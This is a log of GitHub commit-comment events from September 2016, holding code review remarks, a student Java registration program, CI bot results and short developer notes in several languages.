{"id":"4586996880","type":"CommitCommentEvent","actor":{"login":"Camilajcosta"},"repo":{"name":"SisFumec/AtividadeDesafio"},"payload":{"comment":{"id":19089023,"position":null,"line":null,"path":null,"commit_id":"e93907298b915a4efba59b89b0e0abc7bde77503","created_at":"2016-09-20T01:47:41Z","updated_at":"2016-09-20T01:47:41Z","body":"package br.com.estudos.camila;\r\n\r\nimport java.util.Scanner;\r\n\r\n//Arthur Teixeira - Cadastro de Pessoas\r\n\r\npublic class CadastroPessoas {\r\n\t\r\n\tpublic static void main(String[] args) {\r\n\r\n\t\t// LIGANDO O SCANNER - LEIA\r\n\t\tScanner leia = new Scanner(System.in);\r\n\r\n\t\t// entrada de dados\r\n\t\tint quantCad; // VARIAVEL\r\n\r\n\t\tSystem.out.println(\"Digite Quantos Clientes quer Cadastrar: \");\r\n\t\tquantCad = leia.nextInt();\r\n\r\n\t\t// VARIAVEIS CADASTRO\r\n\t\tint i = 0; // Contador do Cadastro\r\n\t\tString[][] cadastroCliente = new String[quantCad][2]; // Matriz\r\n\r\n\t\t// entrada de dados - LOOP\r\n\r\n\t\tfor (i = 0; i < cadastroCliente.length; i++) {\r\n\r\n\t\t\tSystem.out.println(\"Digite o código do Cliente \" + i + \" (* FIM * PARA ENCERRAR CADASTRO): \");\r\n\t\t\tcadastroCliente[i][0] = leia.next();\r\n\r\n\t\t\tif (cadastroCliente[i][0].equalsIgnoreCase(\"FIM\")) {\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\r\n\t\t\tSystem.out.println(\"Digite o nome do Cliente \" + i + \" (* FIM * PARA ENCERRAR CADASTRO): \");\r\n\t\t\tcadastroCliente[i][1] = leia.next();\r\n\r\n\t\t\tif (cadastroCliente[i][0].equalsIgnoreCase(\"FIM\")) {\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\r\n\t\t\tSystem.out.println();\r\n\r\n\t\t\tSystem.out.println(\"Cadastro de número \" + i + \" Concluído\");\r\n\r\n\t\t\tSystem.out.println();\r\n\r\n\t\t\tif (cadastroCliente[i][1].equalsIgnoreCase(\"FIM\")) {\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\r\n\t\t}\r\n\r\n\t\tSystem.out.println(\"Cadastro Finalizado/Interrompido\");\r\n\r\n\t\tint quantProdutos;\r\n\r\n\t\tSystem.out.print(\"Digite o número de produtos a serem cadastrados: \");\r\n\t\tquantProdutos = leia.nextInt();\r\n\r\n\t\tString produtosCodNome[][] = new String[quantProdutos][2];\r\n\t\tfloat produtosValor[] = new float[quantProdutos];\r\n\r\n\t\tfor (i = 0; i < produtosValor.length; i++) {\r\n\r\n\t\t\tSystem.out.print(\"Digite o CÓDIGO do produto \" + i + \" (* FIM * PARA ENCERRAR CADASTRO): \");\r\n\t\t\tprodutosCodNome[i][0] = leia.next();\r\n\r\n\t\t\tif (produtosCodNome[i][0].equalsIgnoreCase(\"FIM\")) {\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\r\n\t\t\tSystem.out.print(\"Digite o NOME do produto \" + i + \": \");\r\n\t\t\tprodutosCodNome[i][1] = leia.next();\r\n\r\n\t\t\tdo {\r\n\t\t\t\tSystem.out.print(\"Digite o VALOR do produto \" + i + \": \");\r\n\t\t\t\tprodutosValor[i] = leia.nextFloat();\r\n\r\n\t\t\t\tif (produtosValor[i] <= 0) {\r\n\t\t\t\t\tSystem.out.println(\"ERRO! Digite valor maior que 0\");\r\n\t\t\t\t}\r\n\r\n\t\t\t} while (produtosValor[i] <= 0);\r\n\r\n\t\t\tSystem.out.println(); // SOMENTE PARA DAR ESPAÇO\r\n\t\t\tSystem.out.println(\"Cadastro Produto de número \" + i + \" finalizado!\");\r\n\t\t\tSystem.out.println(); // SOMENTE PARA DAR ESPAÇO\r\n\r\n\t\t}\r\n\t\tSystem.out.println(); // SOMENTE PARA DAR ESPAÇO\r\n\t\tSystem.out.println(\"Sistema de Cadastro de produtos Encerrado/Finalizado\");\r\n\t\t\r\n\t\t/** CAMILA COSTA **/\r\n\t\t\r\n\t\tSystem.out.println(); // SOMENTE PARA DAR ESPAÇO\r\n\t\tSystem.out.println(\"LISTAS DE CLIENTES\");\r\n\t\r\n\t\tint idx = 0;\r\n\t\tfor (String[] c : cadastroCliente) {\r\n\t\t\tSystem.out.println(\"Cliente: \" + c[0] + \"-\" + c[1]);\r\n\t\t}\r\n\t\t\r\n\t\tSystem.out.println(); // SOMENTE PARA DAR ESPAÇO\r\n\t\tSystem.out.println(\"LISTAS DE PRODUTOS\");\r\n\t\tidx = 0;\r\n\t\tfor (String[] p : produtosCodNome) {\t\t\t\r\n\t\t\tSystem.out.println(\"Produto: \" + p[0] + \"-\" + p[1] + \" Valor: \" + produtosValor[idx]);\r\n\t\t\tidx++;\r\n\t\t}\t\t\r\n\t\tleia.close();\r\n\t}\r\n}\r\n"}},"created_at":"2016-09-20T01:47:41Z"}
{"id":"4587001207","type":"CommitCommentEvent","actor":{"login":"dpgeorge"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":19089030,"position":null,"line":null,"path":null,"commit_id":"bb954d80a4bd467fc321df90cea2b248a90d1570","created_at":"2016-09-20T01:49:16Z","updated_at":"2016-09-20T01:49:16Z","body":"@stinos although it increased coverage by 1.5% I think this broke the 32-bit Appveyor tests... can you give me a hint how to fix it?"}},"created_at":"2016-09-20T01:49:16Z"}
{"id":"4587003569","type":"CommitCommentEvent","actor":{"login":"Keizel"},"repo":{"name":"Darkmet98/vitashell-themes"},"payload":{"comment":{"id":19089036,"position":null,"line":null,"path":null,"commit_id":"656fad21db7f2388f06134b0e0c31659a065d2d2","created_at":"2016-09-20T01:50:07Z","updated_at":"2016-09-20T01:50:07Z","body":"Darkmet, aquí tienes un fallo que se ha quedado en el último commit:\r\n\r\n+NO_SPACE_ERROR                       = \"No hay mas espacio libre en la tarjeta de memoria.\\Se necesita %s de espacio.\"\r\n \r\nNo hay \"más\"\r\n\r\nIgualmente te aconsejo quitar ese \"más\" y poner directamente \"No hay espacio libre..\", queda mejor, ¡pero lo dejo a tu elección!\r\n\r\nPD: Hay dos errores más:\r\n+GENRE                                = \"Generp\"\r\n Sería \"Género\" (falta coma y pusiste una \"P\")\r\n\r\ny segundo error: \r\n+# Audio player strings - Carácteres del reproductor de música\r\n \r\nSería: \"Carácteres del reproductor de audio\"\r\n\"música\" no queda correctamente porque el audio no tiene porqué ser música.\r\n\r\nPor lo demás, ¡todo bien!"}},"created_at":"2016-09-20T01:50:07Z"}
{"id":"4587003644","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19089037,"position":null,"line":null,"path":null,"commit_id":"fa4d61cdd0a6ab31952d733460fe924e79891157","created_at":"2016-09-20T01:50:08Z","updated_at":"2016-09-20T01:50:08Z","body":"Sizing-Simple-Chilled-Ceiling (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2372 of 2372 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-20T01:50:08Z"}
{"id":"4587006188","type":"CommitCommentEvent","actor":{"login":"devrandom"},"repo":{"name":"DaC00P/tablegetter"},"payload":{"comment":{"id":19089044,"position":33,"line":27,"path":"app/controllers/api/searches_controller.rb","commit_id":"e4d588e224fa0e1f288594909464aa3eb4747804","created_at":"2016-09-20T01:51:03Z","updated_at":"2016-09-20T01:51:03Z","body":"Why would the ilike return something that the FT search didn't return?"}},"created_at":"2016-09-20T01:51:03Z"}
{"id":"4587006448","type":"CommitCommentEvent","actor":{"login":"yinqiang520"},"repo":{"name":"yinqiang520/xiaoyanzi"},"payload":{"comment":{"id":19089046,"position":null,"line":null,"path":null,"commit_id":"43343d6ab531b25f1abfd442207c7c1b3ef4857e","created_at":"2016-09-20T01:51:09Z","updated_at":"2016-09-20T01:51:09Z","body":"[教务字42号：安徽信息工程学院2016-2017学年秋季学期开设公共选修课的通知.pdf](https://github.com/yinqiang520/xiaoyanzi/files/481475/42.2016-2017.pdf)\r\n"}},"created_at":"2016-09-20T01:51:09Z"}
{"id":"4587008211","type":"CommitCommentEvent","actor":{"login":"NVchengxuyuan"},"repo":{"name":"NVchengxuyuan/ccc"},"payload":{"comment":{"id":19089053,"position":null,"line":null,"path":null,"commit_id":"7aefe046bb0ddc615615d8ff6668960582ac8e94","created_at":"2016-09-20T01:51:45Z","updated_at":"2016-09-20T01:51:45Z","body":"delete"}},"created_at":"2016-09-20T01:51:45Z"}
{"id":"4587008538","type":"CommitCommentEvent","actor":{"login":"NVchengxuyuan"},"repo":{"name":"NVchengxuyuan/ccc"},"payload":{"comment":{"id":19089056,"position":null,"line":null,"path":null,"commit_id":"7aefe046bb0ddc615615d8ff6668960582ac8e94","created_at":"2016-09-20T01:51:51Z","updated_at":"2016-09-20T01:51:51Z","body":"ddd"}},"created_at":"2016-09-20T01:51:51Z"}
{"id":"4587008706","type":"CommitCommentEvent","actor":{"login":"NVchengxuyuan"},"repo":{"name":"NVchengxuyuan/ccc"},"payload":{"comment":{"id":19089057,"position":null,"line":null,"path":null,"commit_id":"7aefe046bb0ddc615615d8ff6668960582ac8e94","created_at":"2016-09-20T01:51:55Z","updated_at":"2016-09-20T01:51:55Z","body":"ddd"}},"created_at":"2016-09-20T01:51:55Z"}
{"id":"4587010055","type":"CommitCommentEvent","actor":{"login":"devrandom"},"repo":{"name":"DaC00P/tablegetter"},"payload":{"comment":{"id":19089059,"position":38,"line":32,"path":"app/controllers/api/searches_controller.rb","commit_id":"e4d588e224fa0e1f288594909464aa3eb4747804","created_at":"2016-09-20T01:52:22Z","updated_at":"2016-09-20T01:52:22Z","body":"Looks like this section of the code does an \"OR\", while the full text search above does an \"AND\".  Should be consistent - what are the requirements?"}},"created_at":"2016-09-20T01:52:22Z"}
{"id":"4587013239","type":"CommitCommentEvent","actor":{"login":"devrandom"},"repo":{"name":"DaC00P/tablegetter"},"payload":{"comment":{"id":19089073,"position":1,"line":1,"path":".byebug_history","commit_id":"7978aa8b65171edc5026008506ebf766790a7a53","created_at":"2016-09-20T01:53:30Z","updated_at":"2016-09-20T01:53:30Z","body":"This should not be in git, right?\r\n"}},"created_at":"2016-09-20T01:53:30Z"}
{"id":"4587019043","type":"CommitCommentEvent","actor":{"login":"IgnatyevaAnya"},"repo":{"name":"asugubkin/ASM.16.Lab1"},"payload":{"comment":{"id":19089089,"position":6,"line":4,"path":"lab1.py","commit_id":"875f2b3ebfd8d46f7caa5604787327248561770f","created_at":"2016-09-20T01:55:31Z","updated_at":"2016-09-20T01:55:31Z","body":"import st16.main"}},"created_at":"2016-09-20T01:55:31Z"}
{"id":"4587021142","type":"CommitCommentEvent","actor":{"login":"cuitoldfish"},"repo":{"name":"arduino/Arduino"},"payload":{"comment":{"id":19089092,"position":23,"line":496,"path":"hardware/arduino/avr/cores/arduino/USBCore.cpp","commit_id":"2c5dd2029807a7d3fe76ed86a81643db088b5c2c","created_at":"2016-09-20T01:56:13Z","updated_at":"2016-09-20T01:56:13Z","body":"Arduino is using multi-interface and the IAD, but give the class code as CDC(02H), it seems this doesn't conform to the  **USB Interface Association Descriptor Device Class Code and Use Mode**, which says\r\n\r\n>Devices that us the IAD must use the device class, subclass and protocol codes as defined in the example device descriptor illustrated in Table 1-1\r\n\r\nI can not upload that table picture to here, but in that table, the bDeviceClass is EFH, bDeviceSubClass is 02H, bDeviceProtocol is 01H.\r\nthis unconformity will let some OS who conform to that specification failed to enumerate arduino board, such as Nucleus's usb host.\r\n\r\nis arduino intended to support other embedded OS as the host? or only Windows/Linux/iOS?"}},"created_at":"2016-09-20T01:56:13Z"}
{"id":"4587021126","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19089093,"position":null,"line":null,"path":null,"commit_id":"fa4d61cdd0a6ab31952d733460fe924e79891157","created_at":"2016-09-20T01:56:14Z","updated_at":"2016-09-20T01:56:14Z","body":"Sizing-Simple-Chilled-Ceiling (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-20T01:56:14Z"}
{"id":"4587023471","type":"CommitCommentEvent","actor":{"login":"IgnatyevaAnya"},"repo":{"name":"asugubkin/ASM.16.Lab1"},"payload":{"comment":{"id":19089097,"position":25,"line":20,"path":"lab1.py","commit_id":"875f2b3ebfd8d46f7caa5604787327248561770f","created_at":"2016-09-20T01:57:02Z","updated_at":"2016-09-20T01:57:02Z","body":"[\"[16] Игнатьева\", st16.main.main],"}},"created_at":"2016-09-20T01:57:02Z"}
{"id":"4587026408","type":"CommitCommentEvent","actor":{"login":"ahoneybun"},"repo":{"name":"system76/docs"},"payload":{"comment":{"id":19089104,"position":null,"line":null,"path":null,"commit_id":"e1234fb4121c1362944e90ee58142a154eb317ea","created_at":"2016-09-20T01:58:07Z","updated_at":"2016-09-20T01:58:07Z","body":"Yes it is, if you can find it with 'apt search' then it is."}},"created_at":"2016-09-20T01:58:07Z"}
{"id":"4588652679","type":"CommitCommentEvent","actor":{"login":"ravindraprasad75"},"repo":{"name":"ravindraprasad75/chatbot"},"payload":{"comment":{"id":19093651,"position":null,"line":null,"path":null,"commit_id":"c752f87ce143975820d91b3d6dc65138840b3c7d","created_at":"2016-09-20T10:01:06Z","updated_at":"2016-09-20T10:01:06Z","body":"The purpose of the this project chatbot is to create a chat application which understands the natural text and creates key word which will intern speaks various services"}},"created_at":"2016-09-20T10:01:06Z"}
{"id":"4588653131","type":"CommitCommentEvent","actor":{"login":"jstrachan"},"repo":{"name":"fabric8io/fabric8-maven-plugin"},"payload":{"comment":{"id":19093654,"position":238,"line":238,"path":"plugin/src/main/java/io/fabric8/maven/plugin/DebugMojo.java","commit_id":"615adeb3ac33e59c5ba9a8d3ee221b1c8cc66552","created_at":"2016-09-20T10:01:12Z","updated_at":"2016-09-20T10:01:12Z","body":"ah thanks! I wonder if we need to support 1.7 for fabric8:run?"}},"created_at":"2016-09-20T10:01:12Z"}
{"id":"4588655612","type":"CommitCommentEvent","actor":{"login":"ravindraprasad75"},"repo":{"name":"ravindraprasad75/chatbot"},"payload":{"comment":{"id":19093659,"position":1,"line":1,"path":"README.md","commit_id":"c752f87ce143975820d91b3d6dc65138840b3c7d","created_at":"2016-09-20T10:01:40Z","updated_at":"2016-09-20T10:01:40Z","body":"The purpose of the this project chatbot is to create a chat application which understands the natural text and creates key word which will intern speaks various services"}},"created_at":"2016-09-20T10:01:40Z"}
{"id":"4588664891","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19093671,"position":null,"line":null,"path":null,"commit_id":"3ae29ff6b267ddbad0b8e70897444d3ec29137a7","created_at":"2016-09-20T10:03:17Z","updated_at":"2016-09-20T10:03:17Z","body":"@MichaelWallace30 \r\nThe CallBacks work as expected in the C#, but I still feel it may be unstable. I'll run more stress tests on it to be sure it is working nicely. \r\n\r\nI don't like the design I made with this CallBack Wrapper, I might need to modify it a bit.\r\n\r\nI've tried to make it a template, but realized it wouldn't solve the problem of constructing an ABSPacket without knowledge of the child (generics won't let you gcnew a generic constructor). I ended up requiring a reference to the child in the C# library, which kind of sucks.\r\n\r\nDelegates kind of suck a bit, in that they don't work like C function pointers, therefore you HAVE to pass your delegates in this function syntax:\r\n```C#\r\n\tclass Calls {\r\n\t\tpublic Int32 EatShit(HeaderWrapper header, ABSPacket packet) {\r\n\t\t\tBong temp = ABSPacket.GetValue<Bong>(packet);\r\n\t\t\tConsole.WriteLine(\"Hello Woild!\");\r\n\t\t\tConsole.WriteLine(temp.GetCat());\r\n\t\t\treturn 3;\r\n\t\t}\r\n\t}\r\n\r\n\tclass Program {\r\n\r\n\t\tstatic void Main(string[] args) {\r\n\t\t\tCalls caa = new Calls();\r\n\t\t\tCallBack call = new CallBack(new Bing(), caa.EatShit);\r\n\t\t\tcall.CallFunction(new HeaderWrapper(), new Bing());\r\n                        // This kind of sucks, at least they are garbage collected.\r\n```\r\n\r\nWe'll have to look at the design on this in the future, in the meantime they work fine.\r\n\r\nFurthermore, Lambda expressions are not supported in C++CLI mode (CLR), so no lambdas.\r\n\r\nI have yet to see if the packet manager will be able to handle these. That is my next goal in the agenda.\r\nAfter that, I get back to XBee Implementation."}},"created_at":"2016-09-20T10:03:17Z"}
{"id":"4588664916","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/beastscriptr"},"payload":{"comment":{"id":19093672,"position":null,"line":null,"path":null,"commit_id":"abdc961b770ee96df8cd535f1a4859419553ba52","created_at":"2016-09-20T10:03:17Z","updated_at":"2016-09-20T10:03:17Z","body":"[R/beastscriptr.R:64:20:](https://github.com/richelbilderbeek/beastscriptr/blob/abdc961b770ee96df8cd535f1a4859419553ba52/R/beastscriptr.R#L64) *warning:* **no visible global function definition for ‘remove_file_extension’**\n```r\n​  filename_base <- remove_file_extension(input_fasta_filename)\n                   ^~~~~~~~~~~~~~~~~~~~~\n```\n[R/beastscriptr.R:69:22:](https://github.com/richelbilderbeek/beastscriptr/blob/abdc961b770ee96df8cd535f1a4859419553ba52/R/beastscriptr.R#L69) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​  sequences_table <- convert_fasta_file_to_sequences(input_fasta_filename)\n                     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/beastscriptr.R:69:22:](https://github.com/richelbilderbeek/beastscriptr/blob/abdc961b770ee96df8cd535f1a4859419553ba52/R/beastscriptr.R#L69) *warning:* **no visible global function definition for ‘convert_fasta_file_to_sequences’**\n```r\n​  sequences_table <- convert_fasta_file_to_sequences(input_fasta_filename)\n                     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/beastscriptr.R:355:1:](https://github.com/richelbilderbeek/beastscriptr/blob/abdc961b770ee96df8cd535f1a4859419553ba52/R/beastscriptr.R#L355) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​convert_fasta_file_to_sequences <- function(fasta_filename) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_helper.R:17:24:](https://github.com/richelbilderbeek/beastscriptr/blob/abdc961b770ee96df8cd535f1a4859419553ba52/tests/testthat/test_helper.R#L17) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    sequences_table <- convert_fasta_file_to_sequences(\n                       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-20T10:03:17Z"}
{"id":"4588672567","type":"CommitCommentEvent","actor":{"login":"NatashaTheRobot"},"repo":{"name":"tryswift/trySwiftNYC"},"payload":{"comment":{"id":19093685,"position":null,"line":null,"path":null,"commit_id":"70e950687cb2bc13e6713ae015612246fb96c7d2","created_at":"2016-09-20T10:04:51Z","updated_at":"2016-09-20T10:04:51Z","body":"Yeah - should have done it earlier, but was lazy and now it caught up to me!"}},"created_at":"2016-09-20T10:04:51Z"}
{"id":"4588672866","type":"CommitCommentEvent","actor":{"login":"tsapa44"},"repo":{"name":"tsapa44/test"},"payload":{"comment":{"id":19093686,"position":null,"line":null,"path":null,"commit_id":"04d7481252bcbc900c30f7c462821e22e4cdb2dc","created_at":"2016-09-20T10:04:54Z","updated_at":"2016-09-20T10:04:54Z","body":"TeamCity test :: test [Build 19](http://ci.lemmew.com:8111/viewLog.html?buildId=1547&buildTypeId=Test_Test) is now running\n"}},"created_at":"2016-09-20T10:04:54Z"}
{"id":"4588681394","type":"CommitCommentEvent","actor":{"login":"helloword107"},"repo":{"name":"helloword107/hello"},"payload":{"comment":{"id":19093706,"position":null,"line":null,"path":null,"commit_id":"208c02b544dc48759da2bd4490cc73fa158932be","created_at":"2016-09-20T10:06:41Z","updated_at":"2016-09-20T10:06:41Z","body":"JQ使用for循环注意事项\r\n $(\".clearParameter\").on('click', function(event) {\r\n          event.preventDefault();\r\n\t /* Act on the event */\r\n\t var inputVal = $(this).parents(\".modal-content\").find(\"input\");\r\n\t  var selectVal = $(this).parents(\".modal-content\").find(\"select\");\r\n\t  for(var i = 0; i<inputVal.length; i++){\r\n\t  \t $(inputVal[i]).val(\"\");\r\n\t  }\r\n\t  \t\r\n });"}},"created_at":"2016-09-20T10:06:41Z"}
{"id":"4588683395","type":"CommitCommentEvent","actor":{"login":"soumyanishan"},"repo":{"name":"bpramod/azure-linux-extensions"},"payload":{"comment":{"id":19093709,"position":9,"line":94,"path":"VMBackup/main/handle.py","commit_id":"e481a6f4244471f9bc779ae5d55aca801b817a80","created_at":"2016-09-20T10:07:06Z","updated_at":"2016-09-20T10:07:06Z","body":"can we remove this code from here and only have it in HandlerUtil"}},"created_at":"2016-09-20T10:07:06Z"}
{"id":"4588684610","type":"CommitCommentEvent","actor":{"login":"YordanDringov"},"repo":{"name":"WhiteLord/C-Sharp-Basics-Exam17.07.2016"},"payload":{"comment":{"id":19093711,"position":3,"line":2,"path":"README.md","commit_id":"1e5d328b7645645cbbc4db2e755b1e0fbe784500","created_at":"2016-09-20T10:07:21Z","updated_at":"2016-09-20T10:07:21Z","body":"acceptable "}},"created_at":"2016-09-20T10:07:21Z"}
{"id":"4588685876","type":"CommitCommentEvent","actor":{"login":"devamora"},"repo":{"name":"captivationsoftware/react-sticky"},"payload":{"comment":{"id":19093713,"position":null,"line":null,"path":null,"commit_id":"ff37020d0c1f79e918e164a126ca2e6a05b800bc","created_at":"2016-09-20T10:07:38Z","updated_at":"2016-09-20T10:07:38Z","body":"Hi, I was wondering if this is still in progress or you finally decided to abandon that improvement.\r\nI'm also waiting on this and in the meanwhile I have implemented my own solution."}},"created_at":"2016-09-20T10:07:38Z"}
{"id":"4588686512","type":"CommitCommentEvent","actor":{"login":"Mortal"},"repo":{"name":"thomasmoelhave/tpie"},"payload":{"comment":{"id":19093714,"position":null,"line":null,"path":null,"commit_id":"42e5ffb31c853b47a39ba8105648b848001b7dbc","created_at":"2016-09-20T10:07:46Z","updated_at":"2016-09-20T10:07:46Z","body":"How about a vector of unique_ptrs? And let add_owned_node take a unique_ptr instead of just a pointer. Gets rid of the node_map dtor.\r\n\r\nAlso, this is a reference cycle, since the node in m_ownedNodes has a shared pointer to the node_map. Ideally, nodes should only hold weak pointers to node maps. But currently nodes allocate node maps, so this probably requires the node to have both a shared pointer and a weak pointer so pipeline_impl can take the shared_ptr."}},"created_at":"2016-09-20T10:07:46Z"}
{"id":"4588697947","type":"CommitCommentEvent","actor":{"login":"ilaripih"},"repo":{"name":"tflearn/tflearn"},"payload":{"comment":{"id":19093736,"position":null,"line":null,"path":null,"commit_id":"3c025bee4e31226b6c2fd650b8c2338a38fc9e53","created_at":"2016-09-20T10:10:11Z","updated_at":"2016-09-20T10:10:11Z","body":"I was relying on this \"bug\". Now when I try to export a \".pb\" model without a regression layer (for inferencing from C++) I get an exception."}},"created_at":"2016-09-20T10:10:11Z"}
{"id":"4588698767","type":"CommitCommentEvent","actor":{"login":"leo-liu"},"repo":{"name":"CTeX-org/ctex-kit"},"payload":{"comment":{"id":19093737,"position":null,"line":null,"path":null,"commit_id":"5762a604b89acb9010251c6e41272b9bcddbca77","created_at":"2016-09-20T10:10:20Z","updated_at":"2016-09-20T10:10:20Z","body":"这东西加 penalty 的话好 tricky，感觉替换掉 `\\clearpage` 才是常用的用法吧。"}},"created_at":"2016-09-20T10:10:20Z"}
{"id":"4588705170","type":"CommitCommentEvent","actor":{"login":"OsipovDenis"},"repo":{"name":"OsipovDenis/frontend-video-angular"},"payload":{"comment":{"id":19093750,"position":15,"line":15,"path":"client/table/dataService.js","commit_id":"73fdb4bf3ce5b5c729467281ec013a878e79300a","created_at":"2016-09-20T10:11:41Z","updated_at":"2016-09-20T10:11:41Z","body":"круто! я запомнил!"}},"created_at":"2016-09-20T10:11:41Z"}
{"id":"4588705300","type":"CommitCommentEvent","actor":{"login":"SergeyMalkin"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19093752,"position":120,"line":1888,"path":"css-fonts/Fonts.src.html","commit_id":"88471113c35fd19a98f43eecbd0302e1466a06ba","created_at":"2016-09-20T10:11:42Z","updated_at":"2016-09-20T10:11:42Z","body":"Also, do we need range of supported font sizes? I think we discussed this, but don't see it here."}},"created_at":"2016-09-20T10:11:42Z"}
{"id":"4588705531","type":"CommitCommentEvent","actor":{"login":"heinvv"},"repo":{"name":"TKuypers/klantenvertellen"},"payload":{"comment":{"id":19093753,"position":null,"line":null,"path":null,"commit_id":"8587d00ca028c5d95784b838aa983eaaf26807df","created_at":"2016-09-20T10:11:46Z","updated_at":"2016-09-20T10:11:46Z","body":"Ik heb geprobeerd deze plugin te gebruiken, maar zonder succes. \r\n\r\nURL: http://vlastuin.biltongculture.co.za/contact-2/\r\n\r\nDe URLs van mijn klant bij klantenvertellen:\r\nhttps://mobiliteit.klantenvertellen.nl/beoordelingen/van-vlastuin-auto-s-b-v/3535/2\r\nhttp://mobiliteit.klantenvertellen.nl/xml/van-vlastuin-autos-bv\r\n\r\nEnig idee hoe ik dit aan het werk kan krijgen?"}},"created_at":"2016-09-20T10:11:46Z"}
{"id":"4588707326","type":"CommitCommentEvent","actor":{"login":"OsipovDenis"},"repo":{"name":"OsipovDenis/frontend-video-angular"},"payload":{"comment":{"id":19093758,"position":35,"line":35,"path":"client/table/dataService.js","commit_id":"73fdb4bf3ce5b5c729467281ec013a878e79300a","created_at":"2016-09-20T10:12:08Z","updated_at":"2016-09-20T10:12:08Z","body":"повесил .catch на случай ошибки."}},"created_at":"2016-09-20T10:12:08Z"}
{"id":"4588709166","type":"CommitCommentEvent","actor":{"login":"OsipovDenis"},"repo":{"name":"OsipovDenis/frontend-video-angular"},"payload":{"comment":{"id":19093761,"position":37,"line":37,"path":"client/table/dataService.js","commit_id":"73fdb4bf3ce5b5c729467281ec013a878e79300a","created_at":"2016-09-20T10:12:30Z","updated_at":"2016-09-20T10:12:30Z","body":"а нету его теперь!"}},"created_at":"2016-09-20T10:12:30Z"}
{"id":"4588712992","type":"CommitCommentEvent","actor":{"login":"wangkanai"},"repo":{"name":"aspnet/JavaScriptServices"},"payload":{"comment":{"id":19093774,"position":null,"line":null,"path":null,"commit_id":"f7ef36bc7418d3a350a0419cdb0204ca5b28b0a8","created_at":"2016-09-20T10:13:21Z","updated_at":"2016-09-20T10:13:21Z","body":"@SteveSandersonMS when do you think you would have a stable release and include visual studio templete?"}},"created_at":"2016-09-20T10:13:21Z"}
{"id":"4588713970","type":"CommitCommentEvent","actor":{"login":"vladimir-kotikov"},"repo":{"name":"matrosovN/cordova-plugin-file"},"payload":{"comment":{"id":19093776,"position":7,"line":158,"path":"src/windows/FileProxy.js","commit_id":"4b935544f3aff3519cf49630cfcefd4ea60e2c04","created_at":"2016-09-20T10:13:34Z","updated_at":"2016-09-20T10:13:34Z","body":"`sanitizePath` -> `sanitizedPath`"}},"created_at":"2016-09-20T10:13:34Z"}
{"id":"4588715892","type":"CommitCommentEvent","actor":{"login":"bw1984"},"repo":{"name":"SimpleStateManager/SimpleStateManager"},"payload":{"comment":{"id":19093782,"position":null,"line":null,"path":null,"commit_id":"7c4777a6efbcdcb4c611f7cbe93fbb1109f79325","created_at":"2016-09-20T10:13:59Z","updated_at":"2016-09-20T10:13:59Z","body":"cheers for that, did have a scan through the issues but couldn't find \nit. great feature, just what i've been looking for.\n\n\nOn 20/09/2016 10:55, Jonathan Fielding wrote:\n>\n> The only docs is a quick note at the end of this issue, the issue is \n> open so I can document it when I have a chance\n>\n> #16 <https://github.com/SimpleStateManager/SimpleStateManager/issues/16>\n>\n> Thanks\n>\n> Jonathan\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/SimpleStateManager/SimpleStateManager/commit/7c4777a6efbcdcb4c611f7cbe93fbb1109f79325#commitcomment-19093598>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/AEdsCTdw5ailo_RbSAJeHc4lk_v3jmiRks5qr62ggaJpZM4KAjbY>.\n>\n\n"}},"created_at":"2016-09-20T10:13:59Z"}
{"id":"4588717212","type":"CommitCommentEvent","actor":{"login":"flixr"},"repo":{"name":"paparazzi/paparazzi"},"payload":{"comment":{"id":19093787,"position":12,"line":31,"path":"conf/modules/cv_opticflow.xml","commit_id":"dc321aca0e2592c6d6621e3dee6227c80f42cbe3","created_at":"2016-09-20T10:14:17Z","updated_at":"2016-09-20T10:14:17Z","body":"this define doesn't exist anymore now, right?"}},"created_at":"2016-09-20T10:14:17Z"}
